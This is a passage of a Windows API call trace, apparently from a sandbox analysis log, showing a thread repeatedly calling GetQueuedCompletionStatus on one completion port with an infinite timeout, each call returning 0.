GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.311] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.312] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.313] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.314] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.315] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, 